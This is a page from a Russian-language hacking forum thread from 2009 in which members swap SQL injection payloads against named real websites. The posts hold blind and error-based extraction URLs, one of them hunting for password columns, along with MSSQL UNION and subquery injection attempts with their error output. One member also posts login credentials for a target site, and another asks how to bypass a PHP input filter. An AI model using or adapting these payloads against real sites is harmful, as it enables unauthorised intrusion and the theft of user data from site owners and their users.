HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9111  
Старый 26.09.2009, 17:28
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от warlok  
а как в таком случае правильно выводить данные ? т.е. как мне узнать какому символу соответсвует запрос ?
http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((sel ect+table_name+from+information_schema.tables+limi t+1+offset+n)+from+1+ for+1))>1

n=0 – первая таблица
n=1 – вторая таблица
n=2 – третья таблица и тд

http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((sel ect+table_name+from+information_schema.tables+limi t+1+offset+1)+from+n+ for+1))>1

n=1 – первый символ
n=2 – второй символ
n=3 – третий символ и тд

Автоматизируй процесс – накатай скрипт. Или уже готовый заюзай, тут где-то недалеко лежал

ЗЫ базу задротов тебе врятле удастся достать – л2 сервер работает под mssql (если не джава) и как правило доступ к табличкам пользователей имеет только сервер авторизации (или как там он называется не помню уже …). Хотя всякое бывает
 
Ответить с цитированием

  #9112  
Старый 26.09.2009, 18:19
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от S00pY  
только толку от него
more than 1 row

http://takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&p age=1,if(substring(version(),1,1)=5,1,(select+colu mn_name+from+information_schema.columns))

ну и соответственно далее как обычно

http://takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&p age=1,if(ASCII(SUBSTRING((SELECT+table_name+FROM+i nformation_schema.tables+LIMIT+16,1),1,1))<102,1,( select+column_name+from+information_schema.columns ))

============================
 
Ответить с цитированием

  #9113  
Старый 26.09.2009, 18:23
bumerok
Новичок
Регистрация: 25.09.2009
Сообщений: 2
Провел на форуме:
4366

Репутация: 0
По умолчанию

Помогите разобраться с MSSQL injection

Имеем:

SQL
?id=496'

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.

SQL
?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME+FROM+INF ORMATION_SCHEMA.TABLES--

Microsoft OLE DB Provider for SQL Server error '80040e14'
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

SQL
?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,1+FROM+I NFORMATION_SCHEMA.TABLES--

Microsoft OLE DB Provider for SQL Server error '80040e07'
Operand type clash: ntext is incompatible with int

SQL
?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,'a'+FROM +INFORMATION_SCHEMA.TABLES--

Microsoft OLE DB Provider for SQL Server error '80040e14'
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

добавляем поля пока эта ошибка не пропадет...

SQL
?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,'a',1,2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+INFORMATIO N_SCHEMA.TABLES--

ошибок не дает, но и ничего и не выводит

Подскажите пожалуйста куда дальше рыть, или может я уже где-то туплю?
 
Ответить с цитированием

  #9114  
Старый 26.09.2009, 18:24
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

0o
Незадумывался : (....
 
Ответить с цитированием

  #9115  
Старый 26.09.2009, 18:36
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

bumerok
рыть лучше вот сюда:
https://forum.antichat.ru/thread30501.html

А если нужен конкретный ответ по конкретной скуле, то давай линк, гадание на операторах и конструкциях в теме ни к чему.
 
Ответить с цитированием

  #9116  
Старый 26.09.2009, 20:17
bumerok
Новичок
Регистрация: 25.09.2009
Сообщений: 2
Провел на форуме:
4366

Репутация: 0
По умолчанию

jokester

вот линк
тока нужно залогинится

log: bugsrc
pas: qwer1234

http://www.zapoznanie.pl/member/events_more_frame.asp?event_id=496'

+ почему-то из ie8 http 500, a из под ff 3.0.14 нормально
выводит ошибку
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
 
Ответить с цитированием

  #9117  
Старый 26.09.2009, 20:46
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

bumerok, юзай подзапросы
http://www.zapoznanie.pl/member/events_more_frame.asp?event_id=496+or+1=(select+to p+1+table_name+from+information_schema.tables);--
 
Ответить с цитированием

  #9118  
Старый 26.09.2009, 20:57
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

Цитата:
Сообщение от jokester  
more than 1 row
если ?=(select name_const((select 1),1)) true, то лучше так:
Цитата:
http://takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&p age=(select+1+from+(select+*+from+(select+name_con st((select+concat_ws(0x3a,table_schema,table_name, column_name)+from+information_schema.columns+where +column_name+like+0x70617373+limit+1),1),name_cons t((select+concat_ws(0x3a,table_schema,table_name,c olumn_name)+from+information_schema.columns+where+ column_name+like+0x70617373+limit+1),1))a)b)#
 
Ответить с цитированием

  #9119  
Старый 27.09.2009, 15:51
peonix
Познающий
Регистрация: 09.11.2008
Сообщений: 34
Провел на форуме:
36308

Репутация: 2
По умолчанию

Привет всем! Можно ли обойти вот такую защиту?
Все параметры обрабатываются вот такой функцией:
Цитата:
function prov($var, $sql=true) {
$var= htmlspecialchars($var, ENT_QUOTES, "windows-1251");

if(get_magic_quotes_gpc ())
{
$var= stripslashes ($var);

}
if ($sql)
{
$var= mysql_real_escape_string ($var);
}
$var= strip_tags($var);
return $var;
}
 
Ответить с цитированием

  #9120  
Старый 27.09.2009, 18:59
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

Цитата:
Сообщение от peonix  
Привет всем! Можно ли обойти вот такую защиту?
Все параметры обрабатываются вот такой функцией:
for you with love
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ